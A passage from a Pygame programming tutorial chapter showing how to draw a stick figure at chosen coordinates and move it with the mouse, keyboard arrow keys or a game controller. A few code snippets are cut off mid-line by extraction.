distance from the origin. It assumes an origin of (0, 0) and draws the stick figure down and over about 100 pixels. See Figure 10.4 and how the stick figure is not drawn at the (0, 0) coordinate passed in. By adding x and y in the function, we shift the origin of the stick figure by that amount. For example, if we call: draw_stick_figure(screen, 50, 50) The code does not put a stick figure at (50, 50). It shifts the origin down and over 50 pixels. Since our stick figure was already being drawn at about (100, 100), with the origin shift the figure is about (150, 150). How do we fix this so that the figure is actually drawn where the function call requests? Find the smallest x value, and the smallest y value as shown in Figure 10.5. Then subtract that value from each x and y in the function. Don't mess with the height and width values. Here's an example where we subtracted the smallest x and y values: def draw_stick_figure(screen, x, y): # Head pygame.draw.ellipse(screen, BLACK,[96-95+x,83-83+y,10,10],0) # Legs pygame.draw.line(screen, BLACK, [100-95+x,100-83+y], [105-95+x,110-83+y], 2) pygame.draw.line(screen, BLACK, [100-95+x,100-83+y], [95-95+x,110-83+y], 2) # Body pygame.draw.line(screen, RED, [100-95+x,100-83+y], [100-95+x,90-83+y], 2) # Arms pygame.draw.line(screen, RED, [100-95+x,90-83+y], [104-95+x,100-83+y], 2) pygame.draw.line(screen, RED, [100-95+x,90-83+y], [96-95+x,100-83+y], 2) Or, to make a program simpler, do the subtraction yourself: def draw_stick_figure(screen, x, y): # Head pygame.draw.ellipse(screen, BLACK, [1+x,y,10,10], 0) # Legs pygame.draw.line(screen, BLACK ,[5+x,17+y], [10+x,27+y], 2) pygame.draw.line(screen, BLACK, [5+x,17+y], [x,27+y], 2) # Body pygame.draw.line(screen, RED, [5+x,17+y], [5+x,7+y], 2) # Arms pygame.draw.line(screen, RED, [5+x,7+y], [9+x,17+y], 2) pygame.draw.line(screen, RED, [5+x,7+y], [1+x,17+y], 2) 10.2 Mouse Great, now we know how to write a function to draw an object at specific coordinates. How do we get those coordinates? The easiest to work with is the mouse. It takes one line of code to get the coordinates: pos = pygame.mouse.get_pos() The trick is that coordinates are returned as a list, or more specifically a non-modifiable tuple. Both the x and y values are stored in the same variable. So if we do a print(pos) we get what is shown in Figure 10.6. The variable pos is a tuple of two numbers. The x coordinate is in position 0 of array and the y coordinate is in the position 1. These can easily be fetched out and passed to the function that draws the item: # Game logic pos = pygame.mouse.get_pos() x = pos[0] y = pos[1] # Drawing section draw_stick_figure(screen, x, y) Getting the mouse should go in the “game logic” part of the main program loop. The function call should go in the “drawing” part of the main program loop. The only problem with this is that the mouse pointer draws right on top of the stick figure, making it hard to see, as shown in Figure 10.7. The mouse can be hidden by using the following code right before the main program loop: # Hide the mouse cursor pygame.mouse.set_visible(False) A full working example can be found here: ProgramArcadeGames.com/python_examples/f.php?file=move_mouse.py 10.3 Keyboard Controlling with the keyboard is a bit more complex. We can't just grab the x and y from the mouse. The keyboard doesn't give us an x and y. We need to: - Create an initial x and y for our start position. - Set a “velocity” in pixels per frame when an arrow key is pressed down. (keydown) - Reset the velocity to zero when an arrow key is released. (keyup) - Adjust the x and y each frame depending on the velocity. It seems complex, but this is just like the bouncing rectangle we did before, with the exception that the speed is controlled by the keyboard. To start with, set the location and speed before the main loop starts: # Speed in pixels per frame x_speed = 0 y_speed = 0 # Current position x_coord = 10 y_coord = 10 Inside the main while loop of the program, we need to add some items to our event processing loop. In addition to looking for a pygame.QUIT event, the program needs to look for keyboard events. An event is generated each time the user presses a key. A pygame.KEYDOWN event is generated when a key is pressed down. A pygame.KEYUP event is generated when the user lets up on a key. When the user presses a key, the speed vector is set to 3 or -3 pixels per frame. When the user lets up on a key the speed vector is reset back to zero. Finally, the coordinates of the object are adjusted by the vector, and then the object is drawn. See the code example below: for event in pygame.event.get(): if event.type == pygame.QUIT: done = True # User pressed down on a key elif event.type == pygame.KEYDOWN: # Figure out if it was an arrow key. If so # adjust speed. if event.key == pygame.K_LEFT: x_speed = -3 elif event.key == pygame.K_RIGHT: x_speed = 3 elif event.key == pygame.K_UP: y_speed = -3 elif event.key == pygame.K_DOWN: y_speed = # Move the object according to the speed vector. x_coord += x_speed y_coord += y_speed # Draw the stick figure draw_stick_figure(screen, x_coord, y_coord) For a full example see: ProgramArcadeGames.com/python_examples/f.php?file=move_keyboard.py Note that this example does not prevent the character from moving off the edge of the screen. To do this, in the game logic section, a set of if statements would be needed to check the x_coord and y_coord values. If they are outside the boundaries of the screen, then reset the coordinates to the edge. The exact code for this is left as an exercise for the reader. The table below shows a full list of key-codes that can be used in Pygame: 10.4 Game Controller Game controllers require a different set of code, but the idea is still simple. To begin, check to see if the computer has a joystick, and initialize it before use. This should only be done once. Do it ahead of the main program loop: # Current position x_coord = 10 y_coord = 10 # Count the joysticks the computer has joystick_count = pygame.joystick.get_count() if joystick_count == 0: # No joysticks! print("Error, I didn't find any joysticks.") else: # Use joystick #0 and initialize it my_joystick = pygame.joystick.Joystick(0) my_joystick.init() A joystick will return two floating point values. If the joystick is perfectly centered it will return (0, 0). If the joystick is fully up and to the left it will return (-1, -1). If the joystick is down and to the right it will return (1, 1). If the joystick is somewhere in between, values are scaled accordingly. See the controller images starting at Figure 10.8 to get an idea how it works. Inside the main program loop, the values of the joystick returns may be multiplied according to how far an object should move. In the case of the code below, moving the joystick fully in a direction will move it 10 pixels per frame because the joystick values are multiplied by 10. # This goes in the main program loop! # As long as there is a joystick if joystick_count != 0: # This gets the position of the axis on the game controller # It returns a number between -1.0 and +1.0 horiz_axis_pos = my_joystick.get_axis(0) vert_axis_pos = my_joystick.get_axis(1) # Move x according to the axis. We multiply by 10 to speed up the movement. # Convert to an integer because we can't draw at pixel 3.5, just 3 or 4. x_coord = x_coord + int(horiz_axis_pos * 10) y_coord = y_coord + int(vert_axis_pos * 10) # Clear the screen screen.fill(WHITE) # Draw the item at the proper coordinates draw_stick_figure(screen, x_coord, y_coord) For a full example, see ProgramArcadeGames.com/python_examples/f.php?file=move_game_controller.py. Controllers have a lot of joysticks, buttons, and even “hat” switches. Below is an example program and screenshot that prints everything to the screen showing what each game controller is doing. Take heed that game controllers must be plugged in before this program starts, or the program can't detect them. """ Sample Python/Pygame Programs Simpson College Computer Science Show everything we can pull off the joystick """ import pygame # Define some colors BLACK = (0, 0, 0) WHITE = (255, 255, 255) class TextPrint(object): """ This is a simple class that will help us print to the screen It has nothing to do with the joysticks, just outputting the information. """ def __init__(self): """ Constructor """ self.reset() self.x_pos = 10 self.y_pos = 10 self.font = pygame.font.Font(None, 20) def print(self, my_screen, text_string): """ Draw text onto the screen. """ text_bitmap = self.font.render(text_string, True, BLACK) my_screen.blit(text_bitmap, [self.x_pos, self.y_pos]) self.y_pos += self.line_height def reset(self): """ Reset text to the top of the screen. """ self.x_pos = 10 self.y_pos = 10 self.line_height = 15 def indent(self): """ Indent the next line of text """ self.x_pos += 10 def unindent(self): """ Unindent the next line of text """ self.x_pos -= not done: # EVENT PROCESSING STEP for event in pygame.event.get(): if event.type == pygame.QUIT: done = True # 60 frames per second clock.tick(60) # Close the window and quit. # If you forget this line, the program will 'hang' # on exit if running from IDLE. pygame.quit() 10.5 Review 10.5.1 Multiple Choice Quiz 10.5.2 Short Answer Worksheet 10
http://programarcadegames.com/index.php?chapter=controllers_and_graphics&lang=pt-br
CC-MAIN-2017-34
refinedweb
2,331
76.01
UPDATE: A way to patch the vulnerability is provided at the end of the article., S4 mini, Note3 and Ace 4 (and possibly others) are still vulnerable. Introduction At Quarkslab, we like to play with Android devices. So the release day of the Samsung Galaxy S5 we gave a look at the firmware to search for issues. We quickly spotted a simple vulnerability and had a working exploit. The vulnerable application is UniversalMDMApplication, its goal is to make the user enrollment easier for the enterprises. This application is present by default in the Samsung Galaxy S5 ROM (and many others) and is part of the Samsung KNOX security solution for enterprise. When launched with special attributes, we can fool the vulnerable application in thinking that an update is available. The result is a popup showed by the vulnerable application asking the user if he wants to update or not. If the user chooses "yes", an arbitrary application is installed, if not we can relaunch the popup making the user thinks the "cancel" button is not working... Our vulnerability can be triggered via a mail (by clicking on a crafted link) or by browsing a malicious page in Chrome/stock browser. The vulnerability can also be triggered when the attacker is in position of MITM (Man In The Middle) as we can inject arbitrary JavaScript code inside HTML page accessed over HTTP. We kept this vulnerability undisclosed because we thought this could be a good one for the mobile pwn2own but the rules are stricter this year, maybe too strict (they removed the USB category because it means user interaction... come on guys...). With the new rules, the victim is only authorized to click one time, to open the malicious content and nothing else. So when the popup appears, even if most of the user will click on "yes", for the pwn2own guys it is already an invalid vulnerability. Even without the problem of "user interaction", this vulnerability has been patched in August on the Samsung Note 4 and Alpha but not until October for the Samsung Galaxy S5, thus can not be used anymore for the pwn2own. This article will describe how the vulnerability works and try to make developers more aware of this kind of bugs. A video showing the exploitation of the vulnerability is also present. - Timeline: - April 2014 - Release of the Samsung Galaxy S5 and discovery of the vulnerability. - August 2014 - Release of the Samsung Galaxy Note 4 and Alpha. The vulnerability is patched in their release ROMs. - October 2014 - The vulnerability is patched in the Samsung Galaxy S5. - November 2014 - Mobile Pwn2Own contest. - To our knowledge the following models are still vulnerable: - Samsung Galaxy S4 (version checked: I9505XXUGNH8) - Samsung Galaxy S4 mini (version checked: I9190UBUCNG1) - Samsung Galaxy Note 3 (version checked: N9005XXUGNG1) - Samsung Galaxy Ace 4 (version checked: G357FZXXU1ANHD) Warning: This list is not exhaustive and others models can also be vulnerable. UPDATE: A way to patch the vulnerability is provided at the end of the article. The vulnerability Short writeup The UniversalMDMClient application is installed by default as part of Samsung KNOX. It registers a custom URI "smdm://". When an user clicks on a link to open an URL starting by "smdm://", the component LaunchActivity of UniversalMDMClient will be started and will parse the URL. Many information is extracted from the URL, and among them an update server URL. After having extracted the update server URL, the application will try to do a HEAD on the URL. It will check if the server returns the non standard header "x-amz-meta-apk-version". If this happens, it will compare the current version of the UniversalMDMClient application to the version specified in the "x-amz-meta-apk-version" header. If the version in the header is more recent, it will show a popup to the user explaining that an update is available and asking if he wants to install it or no. If the user choose "yes", the application will do a GET on the update server URL and the body of the answer is saved as an APK file. Last but not least it will be installed without prompting the user about the permission asked by the application or checking the certificate used to sign the APK. Hence, if an attacker can trick the user into accepting the update, he can install an arbitrary application with arbitrary permissions. The vulnerability has been patched in October 2014 by checking if the package name of the downloaded APK is the same as the package name of UniversalMDMClient application. Since it is not possible to have two applications with the same package name and signed by two different certificates, it becomes impossible to install an arbitrary application. Detailed writeup Looking at the UniversalMDMClient's AndroidManifest.xml file, we can see that it defines a custom URI: The intent-filter registers (line 11-16) the custom URI "smdm://" and associates it to the com.sec.enterprise.knox.cloudmdm.smdms.ui.LaunchActivity component. When the user (or his browser ;) ) will try to open a "smdm://" URI, the onCreate() method of LaunchActivity will handle the situation. From here, we will dive into the code. Besides the application has been ""obfuscated"" by proguard, it is not really a problem to analyse it using the JEB decompiler and his ability to let the user rename methods and classes. Below is the source code decompiled and renamed of the onCreate() method: The first thing done by the onCreate() method is to check (via the function getPreETAG()) the presence of a file named PreETag.xml inside the directory /data/data/com.sec.enterprise.knox.cloudmdm.smdms/shared_prefs/. If the file exists, the application aborts its execution by calling the finish() method. By default, the file PreETag.xml does not exit. The application will now try to get the Intent used to start the Activity and more precisely the data attached to it. The data must be of the form "smdm://hostname?var1=value1&var2=value2". The parsed variables names can be easily obtained from the source: seg_url, update_url, email, mdm_token, program and quickstart_url. The most important is update_url. After writing all these variables values inside a shared_preference file, onCreate() ends by calling Core.startSelfUpdateCheck(): The Core.startSelfUpdateCheck() checks if an update is currently in progress, if not it calls UMCSelfUpdateManager.startSelfUpdateCheck(): The function verifies that data connection is available, deletes pending update if present, constructs an URL based on the value of the umc_cdn string inside the shared_pref file "m.xml" and append to it the constant string "/latest". The value of umc_cdn is the value of our Intent data variable udpdate_url. So this is a value fully controlled by an attacker. It then calls UMCSelfUpdateManager.doUpdateCheck() with as first parameter the previously constructed URL: Inside this function, a ContentTransferManager class instance is initialized and a HEAD HTTP request is performed on the attacker controlled URL. The different states which will be encountered during the life of the HTTP request are handled by the handleRequestResult class and methods onFailure(), onProgress(), onStart(), onSucess(), etc. The most interesting method is of course onSucess(). It checks that different headers are present : ETag, Content-Length and x-amz-meta-apk-version. The value of the header x-amz-meta-apk-version is compared to the current UniversalMDMApplication APK package version. If the header x-amz-meta-apk-version contains a number bigger than the current APK version, then an update is needed. At this point a popup appears on the screen of the user, explaining that an update for his application is available and asking if he wants to install it or no. If he chooses yes, we can continue our analysis, and the attack. If the user chooses "yes", UMCSelfUpdateManager.onSuccess() is called, and before returning, it calls his parent onSucess() method which has the following code: This onSuccess() will finaly call beginUpdateProcess() which will start an update thread: The update thread will call installApk() which in turn will call _installApplication() whose role is to disable the package verifier (to prevent Google from scanning the APK at the installation), install the APK and reenable the packager verifier: And... that's all. At no time the download APK authenticity is checked nor the asked permissions are showed to the user. Hence, this vulnerability allows an attacker to install an arbitrary application. Once the update have been installed, it is not possible to exploit the vulnerability anymore because when a successful update has been installed, the value of the ETag header is written in /data/data/com.sec.enterprise.knox.cloudmdm.smdms/shared_prefs/PreETag.xml, and the existence of the file is the first check done inside the onCreate() method of LaunchActivity. If the file already exists, the method calls finish() and the execution aborts. The patch by Samsung In order to prevent the installation of an arbitrary APK, the application now checks the package name before installing it. The APK package name must be the same that the package name of UniversalMDMApplication. This means that the APK must be an update of UniversalMDMApplication and signed by the same certificate. Thus it is not possible to install an arbitrary application anymore. Below is the function performing the check: The following popup appears on a patched system: The exploit The exploit is pretty simple, you have to make your victim run your custom URI by making him click on it in a mail or by redirecting to it in JavaScript in a web page : <script> function trigger(){ document.location="smdm://meow?update_url="; } setTimeout(trigger, 5000); </script> The interesting fact about triggering the exploit via JavaScript code inside a web page, is that if the user choose "cancel" and deny the update, Android will give focus back to our web page and resume the execution of our JavaScript code. This mean we can do a loop inside the JavaScript code that will trigger the vulnerability. This is so quick that a lambda user will think that the "cancel" button of the popup is not working correctly. If the user choose "yes", it will install the arbitrary APK and prevent further running of the application. For the server part you have to return the following headers: - x-amz-meta-apk-version : an arbitrary number but abnormally big for a version number, like 1337 ; - ETag : the md5sum of the arbitrary APK ; - Content-Length : the size of the arbitrary APK (used by the progress bar). Here is the code of server part: import hashlib from BaseHTTPServer import BaseHTTPRequestHandler APK_FILE = "meow.apk" APK_DATA = open(APK_FILE,"rb").read() APK_SIZE = str(len(APK_DATA)) APK_HASH = hashlib.md5(APK_DATA).hexdigest() class MyHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Content-Length", APK_SIZE) self.send_header("ETag", APK_HASH) self.send_header("x-amz-meta-apk-version", "1337") self.end_headers() self.wfile.write(APK_DATA) return def do_HEAD(self): self.send_response(200) self.send_header("Content-Length", APK_SIZE) self.send_header("ETag", APK_HASH) self.send_header("x-amz-meta-apk-version", "1337") self.end_headers() return if __name__ == "__main__": from BaseHTTPServer import HTTPServer server = HTTPServer(('0.0.0.0',8080), MyHandler) server.serve_forever() Below is a video showing the exploit on a patched and unpatched version of the Samsung Galaxy S5 :
https://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
CC-MAIN-2018-43
refinedweb
1,864
53.81
I am having problems figuring out how to get the results from the strings and then give myself the option to sort through them alphabetically (or numerically). I have the code to the point where it shows the input data but don't know where to go from there. I'm fairly new to java so I don't even know if I'm doing the first part right. I have looked in to sort options with Arrays but am not to sure how to use them (or if I have done it right to allow myself to use them). Any help would be appreciated. Below is a copy of my code. The questions I am trying to solve is "Your program should then use a menu that allows the user to display, search and exit. Display should display the list of the entries, sorted by last name, first name, or birth-date as requested by the user. Search should search for a specific entry by a specific field (last name, first name or birth-date) as requested by the user." import javax.swing.JOptionPane; public class Program2 { //Loop # public static void main(String [] args) { int Runs; do{ String runQuestion = JOptionPane.showInputDialog(null, "Number of patients to enter in? (1-2)", "Total # Of Patients", JOptionPane.QUESTION_MESSAGE); Runs = Integer.parseInt(runQuestion); if( Runs < 1 || Runs > 2) { //Small test numbers for now JOptionPane.showMessageDialog(null, "Please pick a number between 1 and 2", "Wrong Number Chosen", JOptionPane.INFORMATION_MESSAGE); } } while(Runs < 1 || Runs > 2); Questions(Runs); } //Data Gathering Questions public static void Questions(int Runs) { for(char index = 0;index < Runs;index ++) { //Questions String firstName = JOptionPane.showInputDialog(null, "Patients First Name?", "First Name", JOptionPane.QUESTION_MESSAGE); String lastName = JOptionPane.showInputDialog(null, "Patients Last Name?", "Last Name", JOptionPane.QUESTION_MESSAGE); String dateBirth = JOptionPane.showInputDialog(null, "Patients Date of Birth?", "DOB", JOptionPane.QUESTION_MESSAGE); String firstSort = String firstName; //Data Table print list System.out.println(firstName + " " + lastName + " " + dateBirth); } } }
https://www.daniweb.com/programming/software-development/threads/383948/display-search-and-exit-string-inputs
CC-MAIN-2017-09
refinedweb
320
59.9
Map particles to letters in AS3 I saw a banner advert on a website where the particles formed different letters and shapes then dispersed to create new letters and shapes. The particle letters were made from circles evenly spaced apart to form the outline of the letters. I will attempt to recreate this effect in two sections. The first section will create a single word and the second section will create a library of letters which can be used to form multiple words. The process of mapping particles to letters starts with drawing the text on the stage to be mapped. The coordinates of the particles are stored using the Bitmapdata class to work out the width and height spacing of the letters. Once the coordinate data has been stored the particles can be generated and animated. Single Word Step 1 – Draw letters on stage Create a new AS3 file and save it with the name: MapParticles. Select the Text tool with static text, black colour and type your message on the stage. Convert the text into a movie clip (F8) ensuring the top left registration point is selected and the instance name is: letters. Also make sure the movie clip is positioned at (0, 0) coordinates on the stage. Open new AS3 file and save it with the name: MapParticles and add the following setup code. package { import flash.display.BitmapData; import flash.display.Sprite; import flash.display.MovieClip; import com.greensock.TweenMax; import com.greensock.easing.*; public class MapParticles extends MovieClip { private var positions:Array = []; private var SPACING_Y:uint = 5; private var SPACING_X:uint = 5; private var circlesArray:Array = []; private var circleRadius:uint = 3; private var container:Sprite; public function MapParticles() { } private function shuffle(arr:Array):void { var l:int=arr.length; var i:int=0; var rand:int; for(; i < l; i++) { var tmp:* =arr[int(i)]; rand=int(Math.random()*l); arr[int(i)]=arr[rand]; arr[int(rand)]=tmp; } } } } Step 2 – Store letter coordinate In the constructor add the following code below. This will create a Bitmapdata of the movie clip and adds the x and y positions of the black pixels with a 5 pixel vertical and horizontal spacing. The shuffle function will randomise the positions array and the generateParticles() will creates the particles which will be written in the next step. //hides the letters movie clip letters.visible = false; //particle container container = new Sprite(); addChild(container); //bitmapdata of letters var bmd:BitmapData = new BitmapData(letters.width, letters.height, false, 0xffffff); bmd.draw(letters); //total rows and total columns var rows:int = letters.height / SPACING_Y; var cols:int = letters.width / SPACING_X; //add the x and y pixels values to array with a spacing of 5 pixels for(var i:int = 0; i < cols; i++){ for(var j:int = 0; j < rows; j++){ var pixelValue:uint = bmd.getPixel(j * SPACING_X, i * SPACING_Y); if(pixelValue.toString(16) != 'ffffff' && pixelValue.toString(16) != '0'){ positions.push({xpos:j * SPACING_X, ypos:i * SPACING_Y }); } } } //randomise positions arrau shuffle(positions); //generate particles generateParticles(); Step 3 – Generate particles Once the x and y particle positions have been stored, the particles can be generated. I have used the Graphics API to draw circles with random colours and the radius at 3 pixels. The x and y positions of the particles are set by the positions array. private function generateParticles():void { for(var i:int = 0; i < positions.length; ii++) { var circle = new Sprite() circle.graphics.beginFill(Math.random() * 0xffffff); circle.graphics.drawCircle(0, 0, circleRadius); circle.graphics.endFill(); container.addChild(circle); circle.x = Math.random() * stage.stageWidth; circle.y = Math.random() * stage.stageHeight; circle.alpha = 0; circlesArray.push(circle); } } Step 4 – Animate particles The particles have been created and are now ready to be animated. I have used the greensock TweenMax class to animate the particles. The particles are animated and dispersed using the animateParticles() and disperseParticles() function. private function animateParticles():void { for(var i:int = 0; i < circlesArray.length; i++) { TweenMax.to(circlesArray[i],1, { x:positions[i].xpos, y:positions[i].ypos, alpha: 1, delay:i * 0.01, ease:Back.easeOut, easeParams:[3]}); } } private function disperseParticles():void { for(var i:int = 0; i < circlesArray.length; i++) { TweenMax.to(circlesArray[i], 1, { x: Math.random() * stage.stageWidth, y: rath.random() * stage.stageHeight, alpha: 0, delay:i * 0.01, ease:Back.easeIn, easeParams:[1]}); } } 4 comments: Love this tutorial but unfortunately I'm new to ac3 and after following the directions i can't seem to get this to work. is the first code part of the package(class) or do all of these codes go into the same .as file and how to get this into flash "import MapParticles."? Sorry for the dumb questions but I would love to get to know who to do this stuff. thanks @Russell, Sorry to be blunt, but if you don't know how to use Class files. Then this tutorial is probably too advanced for you at this stage. hi :) I am using flash cs6. i've already retype the code but nothing happened. I download greensock tweenmax and the others here is it wrong? if it's wrong please give mw the correct link. if I right to download the files there, what should I do ?? thank you @Hima, Be sure you have completed step 4.
http://www.ilike2flash.com/2013/05/map-particles-to-letters-in-as3.html
CC-MAIN-2017-04
refinedweb
882
50.33
SHUTDOWNHOOK_ESTABLISH(9) BSD Kernel Manual SHUTDOWNHOOK_ESTABLISH(9) shutdownhook_establish, shutdownhook_disestablish - add or remove a shut- down hook #include <sys/types.h> #include <sys/systm.h> void * shutdownhook_establish(void (*fn)(void *), void *arg); void shutdownhook_disestablish(void *cookie); The shutdownhook_establish() function adds fn to the list of hooks in- voked by doshutdownhooks(9) at shutdown. When invoked, the hook function, timeouts, and other interrupt-driven services) or even basic system integrity (because the system could be rebooting after a crash). Shutdown hooks are, like startup hooks, implemented via the more general dohooks(9) API. If successful, shutdownhook_establish() returns an opaque pointer describing the newly established shutdown hook. Otherwise, it returns NULL. It may be appropriate to use a shutdown hook to disable a device that does direct memory access, so that the device will not try to access memory while the system is rebooting. It may be appropriate to use a shutdown hook to inform watchdog timer hardware that the operating system is no longer running. dohooks(9), doshutdownhooks(9), dostartuphooks(9) Shutdown hooks should only be used to do what's strictly necessary to do to ensure a correct reboot. Since shutdown hooks are run even after a panic, a panic caused by a shutdown hook will automatically cause the shutdown hook to be run again causing an endless loop. An example of things that need to be done in a shutdown hook could be stopping DMA en- gines that might corrupt memory when rebooting. An example of things that shouldn't be done in a shutdown hook is syncing the file systems. Once again, since the system could be rebooting because of an internal incon- sistency, writing down anything to permanent storage or trusting the internal state of the system is a very bad idea. The names are clumsy, at best..
http://mirbsd.mirsolutions.de/htman/sparc/man9/shutdownhook_establish.htm
crawl-003
refinedweb
300
52.29
Guessing Game - Online Code Description Briefing: In this game, the user and the computer choose each one an option between stone, scissors and paper. Stone wins over scissors, scissors over paper and paper over stone: Stone -> Scissors -> Paper -> Stone... The first who wins WINSCORE times is the competition winner. Source Code #include <iostream.h> #include <stdlib.h> #include <time.h> #define WINSCORE 3 // Function PickRandomOption // * Returns a random character between 's', 'x', and 'p' char PickRandomOption (void) { char opti... (login or register to view full code) To view full code, you must Login or Register, its FREE. Hey, registering yourself just takes less than a minute and opens up a whole new GetGyan experience.
http://www.getgyan.com/show/341/Guessing_Game
CC-MAIN-2018-43
refinedweb
114
67.45
Introduction to Regular Expression in Ruby Regular Expressions in Ruby are some sequence of characters which are used to search other matches string, for example, if you are searching for the “sofa” in the sentence “sofa is beautiful” then we can use the “sofa is beautiful” =~ /sofa(.*)/ , here we are simply checking if the sofa is available inside the sentence “sofa is beautiful”, so we can understand the importance of the regular expression in Ruby, with the help of regular expression we can search for the very complex string or set of strings also we can use them for validating any request, for example checking if the request string contains given pattern of string then only valid. Syntax Below is the syntax for the regular expression in the Ruby. In the given line of code we have written /pattern/, so here we are simply checking for the patter, and in the same block we can specify the ranges for it. For example /\D/ here D means numeric value only. We can also write in the way like /[a-z]/, which means all the lower cases from a to z. We will focus more on the syntax in the example part. The optional check can be used check after all inner pattern completed, here it can be like \D to check known digit. /search string or pattern/optional check. Examples to Implement Regular Expression in Ruby We can use Regular Expressions in the many real-time situations like we can use it when we have to find some specific pattern out of a given sentence, we can use it to replace with match pattern, even we can use it to test if the given string or the set of string falls under the given format. Let us discuss all these situations with one example. Example #1 Operators used in the given example and their meaning. - =∽ : here we are using the operator =∽ , this operator contains two things one is a regular expression and another is for matching the string. - .*: This operators we have used it is checking for the matching of a complete word, * represent to match the complete word like “sofa”, so it should match the complete word “sofa” here. This is the first example for the Regular Expression in the Ruby below is the explanation for the code. This example is to check if the search string is available inside the sentences. We have their variables sentence1, sentence2, and sentence3 and all these variables contain sentences. Our goal is to check if the variables containing a sentence are containing a particular word or pattern. Example sofa, car, and city. First, two contain the sofa and car but the sentence3 does not contain the city. In the code below we have prints success for the first two cases and for the second case it fails. Code: sentence1 = "This is a very beautiful sofa"; sentence2 = "This is a very beautiful car"; sentence3 = "This is a very beautiful house" if ( sentence1 =~ /sofa(.*)/ ) puts "sentence1 contains sofa" end if ( sentence2 =~ /car(.*)/ ) puts "sentence2 contains car" end if (sentence3 =~ /city(.*)/) puts "sentence3 contains city" else puts "The term city is not there in this sentence3" end Output: Example #2 Operators used in these examples are, - \D(expression): This operator are used for any no-digit, we have many other operators like \d(for any digit),\s(for white space characters),\S(for any nonwhite space characters) - sub!: This method is used for the string in the Ruby, it makes a copy of all the string occurrences of pattern for the passed second argument to it. We can explain the below code in the following steps, We have defined a variable student, it contains the sentence with registration number and a few more details. The registration number is the only numeric value in the given sentence. Here we are fetching the registration number with the help of the sub-method which finds the data from the sentence in the required format which we have passed to it. Code: #The student variable contains the student details along with the registration number in the same sentence . student = "My name is Ranjan Kumar and my registration number is 111100011" student = student.gsub!(/\D/, "") puts "Student Registration Number is #{student}" Output: Example #3 Operators used for these examples, - Sub! (method): Return a new string with removing all the other strings according to parameters passed to it in regular expression format. - /#.*$/(expression): In this expression we are selecting all the attributes after the comment of Ruby and removing all the contents after comment. .* used to select all after specific symbol #. This example is to fetch the string and numeric both except the sentence start with #. We can explain the below example in the following steps. We have a variable called card which holds the sentence containing card details and few more contents. Here we are using the function sub of Ruby, we are passing pattern here /#.*/, which means we are telling to the function consider the contents of the sentence and discard the sentence start with #. Code: card = "The debit card number is 2222-8880-8989-6789 #valid for 3 days only" # Delete Ruby-style comments card = card.sub!(/#.*$/, "") puts "#{card}" Output: Example #4 Operators used for this example is, - match(method): This method is used for matching the string. - [^aeiou\W](expression): In this expression we are using operator ^ which specify the start of the letter should be from the letter given. And \W this is used for checking if the string starts with any numeric value. In the below example we are trying to find if the given name starts with a vowel or not. We are returning true if it is not starting with a vowel and false if it is starting with a vowel. We can explain the below code in the following steps, First we have defined a function with the name not_start_with_vowel and this function is taking a string as it’s a parameter. This string is the names that are coming from the call to check if they start with a vowel or not. Here we are using the match method of Ruby to check if the given string starts with a vowel or not. We have used the pattern /^aeiou/W, here ^ indicates for the first letter, and \W we have used to check if the given string starts with any numeric characters. Finally we have if and else block so if the first letter is a vowel it will return false as it will match with nil. In the else block if it is not nil which means start does not start with a vowel it will return the true. Code: def not_start_with_vowel(string) if /^[^aeiou\W]/i.match(string) == nil return false else return true end end puts "The name ranjan does not start with vowel is #{not_start_with_vowel("ranjan")}" puts "The name ranjan does not start with vowel is #{not_start_with_vowel("ajay")}" Output: Conclusion From this tutorial we learned about the Regular Expression of the Ruby and we learned it’ uses in the real world, we saw many examples in these tutorials which will be useful at any instances to filtering or validating any given string or the set of the strings. Recommended Articles This is a guide to Regular Expression in Ruby. Here we discuss Introduction to Regular Expression in Ruby, Syntax, Examples with code and output. You can also go through our other related articles to learn more –
https://www.educba.com/regular-expression-in-ruby/?source=leftnav
CC-MAIN-2022-40
refinedweb
1,248
58.21
i'm trying to create a simple program for VC++ 2008. It's been years since i last did a program in C++ and i've never used 2008 before except yesterday. I've been trying to remove these errors for hours already. I'm suppose to take an exam on it today but i still can't run the program. someone told me that i should post this topic here... HELP me pls! // jkhui.h #pragma once #include "stdafx.h" #include <iostream> #include "string.h" using namespace std; int main; namespace jkhui{ public class Class1 { // TODO: Add your methods for this class here. { long n, f, i; cout;//"Enter No: \n" cin ;//n (i=n i>=1 i--) f = f*1 cout ;//f; } }; } and these are the errors i received... 1>------ Build started: Project: jkhui, Configuration: Debug Win32 ------ 1>Compiling... 1>jkhui.cpp 1>c:\documents and settings\acer valued client\my documents\visual studio 2008\projects\jkhui\jkhui\jkhui.h(14) : error C2059: syntax error : '{' 1>c:\documents and settings\acer valued client\my documents\visual studio 2008\projects\jkhui\jkhui\jkhui.h(14) : error C2334: unexpected token(s) preceding '{'; skipping apparent function body 1>Build log was saved at ":\Documents and Settings\acer valued client\My Documents\Visual Studio 2008\Projects\jkhui\jkhui\Debug\BuildLog.htm" 1>jkhui - 2 error(s), 0 warning(s) ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ========== I have a feeling that I'm missing something but I just can't find it. HELP please... 1. Please use code tags in future. 2. There are lots of things wrong Firstly you haven't defined a method in your class for your code. You can't just put code into a class like you have without defining a method for it. Secondly you haven't defined a main method for your application. Therefore your application doesn't know which code to run on startup. Thirdly std::cin and std::cout are used with the << and >> operators e.g. Code: int length = 0; std::cin >> length; std::cout << length; Lastly the line Code: (i=n i>=1 i--) makes no sense at all. Do you intend a for loop ? In which case the format should be : Code: for (i=n i>=1 i--) { // code to run every iteration goes in here } Darwen. int length = 0; std::cin >> length; std::cout << length; (i=n i>=1 i--) for (i=n i>=1 i--) { // code to run every iteration goes in here } - PInvoker - the .NET PInvoke Interface Exporter for C++ Dlls. View Tag Cloud Forum Rules
http://forums.codeguru.com/showthread.php?470439-newbie-on-VC-2008
CC-MAIN-2017-43
refinedweb
433
66.44
